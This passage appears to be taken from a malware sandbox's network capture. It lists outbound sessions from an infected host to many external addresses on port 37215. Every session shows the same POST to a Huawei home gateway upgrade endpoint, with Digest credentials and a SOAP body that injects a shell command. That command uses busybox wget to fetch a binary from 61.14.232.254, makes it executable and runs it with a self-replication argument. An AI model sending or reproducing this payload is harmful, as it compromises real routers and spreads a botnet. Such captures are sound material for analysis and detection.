69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  539192.168.2.1336158195.88.155.23037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320488930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  540192.168.2.133539252.110.253.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320529938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  541192.168.2.133338041.101.81.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320560932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  542192.168.2.133903479.25.27.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320617914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  543192.168.2.133390441.79.148.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.320784092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  544192.168.2.1356866157.52.159.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321043968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  545192.168.2.1337154157.75.46.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321063995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  546192.168.2.1333200197.29.184.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321080923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  547192.168.2.1356672197.102.14.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321103096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  548192.168.2.1357300157.38.222.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321116924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  549192.168.2.134122276.38.149.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321136951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
